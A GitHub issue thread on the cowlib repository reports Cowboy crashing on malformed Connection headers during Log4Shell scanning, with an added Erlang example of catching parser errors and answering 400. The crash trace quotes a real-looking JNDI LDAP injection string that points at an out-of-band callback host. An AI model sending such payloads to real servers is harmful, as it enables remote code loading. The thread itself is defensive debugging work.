ninenines / cowlib

Support library for manipulating Web protocols.
ISC License

Crash on malformed Connection header #129

Closed zinid closed 1 year ago

zinid commented 1 year ago

The cowlib parser crashes (due to function_clause) on malformed values of the Connection header. This typically looks like:

exception error: no function clause matching
                     cow_http_hd:token_ci_list_sep(<<"{jndi:ldap://127.0.0.1#wecd4kxqkow4d2sr4xangidqbzpv4i2c2zqo3v6ackocbf2epm7dbr2kgm.oob.li:1389/a}">>,
                                                   [<<"$">>]) (...)

The problem has recently worsened due to the appearance of log4j exploits (CVE-2021-44228). For example, we get around 30k related cowboy crashes per week, so this is not a cosmetic issue anymore, as it creates a burden for the OPS team. Another complication is that this malformed value can be put by the exploiting script into any header, so it seems that not only the Connection header is affected: as explained in the vulnerability description, it can be put into User-Agent, Authorization and so on.

Can this somehow be resolved?

P.S. I'm not quite sure whether this problem relates to cowlib or cowboy. Sorry if I opened the ticket in a wrong repository.

essen commented 1 year ago

Cowboy! I think Cowlib crashing is fine, but Cowboy should catch the exceptions for the headers that it parses instead of erroring out noisily like this.
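
An illustration of the split essen describes, added here as an example and not code from cowlib or Cowboy: the strict parser stays strict and raises error:function_clause on input outside the token grammar (the same failure mode the trace above shows for cow_http_hd:token_ci_list_sep), while the server-side caller catches that error and turns it into an error tuple it can answer with a 400 instead of letting the request process crash. The parse_connection/1 below is a simplified stand-in for cow_http_hd:parse_connection/1 (its exact shape is an assumption), and the header values in sample/0 are constructed.

```erlang
%% Added example; not cowlib or Cowboy code. Strict RFC 7230 token-list
%% parser plus a caller-side wrapper that converts parser crashes into a
%% malformed-header error the server can report as 400 Bad Request.
-module(safe_connection_hd).
-export([parse_connection/1, safe_parse/2, sample/0]).

-define(IS_ALPHA(C), ((C >= $a andalso C =< $z) orelse (C >= $A andalso C =< $Z))).
-define(IS_DIGIT(C), (C >= $0 andalso C =< $9)).
%% tchar from RFC 7230 section 3.2.6: ALPHA / DIGIT / "!#$%&'*+-.^_`|~"
-define(IS_TOKEN(C), (?IS_ALPHA(C) orelse ?IS_DIGIT(C)
    orelse C =:= $! orelse C =:= $# orelse C =:= $$ orelse C =:= $%
    orelse C =:= $& orelse C =:= $' orelse C =:= $* orelse C =:= $+
    orelse C =:= $- orelse C =:= $. orelse C =:= $^ orelse C =:= $_
    orelse C =:= $` orelse C =:= $| orelse C =:= $~)).

%% Strict parser (stand-in for cow_http_hd:parse_connection/1, assumed):
%% comma-separated list of tokens, each returned lowercased. A byte that is
%% not a tchar matches no clause of token/2, so the call fails with
%% error:function_clause, exactly like the cowlib crash in this issue.
parse_connection(Bin) when is_binary(Bin) ->
    [token(T, <<>>) || T <- split_csv(Bin)].

split_csv(Bin) ->
    [T || T <- [strip(P) || P <- binary:split(Bin, <<",">>, [global])],
          T =/= <<>>].

strip(Bin) -> string:trim(Bin, both, " \t").

token(<<>>, Acc) -> Acc;
token(<<C, Rest/bits>>, Acc) when ?IS_TOKEN(C) ->
    token(Rest, <<Acc/binary, (lower(C))>>).

lower(C) when C >= $A, C =< $Z -> C + 32;
lower(C) -> C.

%% Caller-side wrapper: this is what the HTTP server layer should do around
%% any cowlib header parser. Parser errors become {error, malformed_header};
%% the caller can then reply 400 and log one line instead of a crash report.
safe_parse(ParseFun, Value) when is_function(ParseFun, 1) ->
    try
        {ok, ParseFun(Value)}
    catch
        error:Reason -> {error, {malformed_header, Reason}}
    end.

%% Constructed sample values: a valid header and one that would crash the
%% strict parser on its first byte.
sample() ->
    Good = <<"Keep-Alive, upgrade">>,
    Bad  = <<"{not a token}">>,
    {safe_parse(fun parse_connection/1, Good),
     safe_parse(fun parse_connection/1, Bad)}.
```

Calling safe_connection_hd:sample() returns {{ok, [<<"keep-alive">>, <<"upgrade">>]}, {error, {malformed_header, function_clause}}}; the important property is that the second element is a value, not an exit of the calling process. Catching error:Reason rather than only function_clause is a deliberate choice: other malformed inputs may surface as badmatch or badarg from a strict parser, and from the server's point of view all of them mean the same thing, an unparseable header that deserves a 400.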

zinid commented 1 year ago

Okay, I will try to prepare a PR to the Cowboy repository ASAP.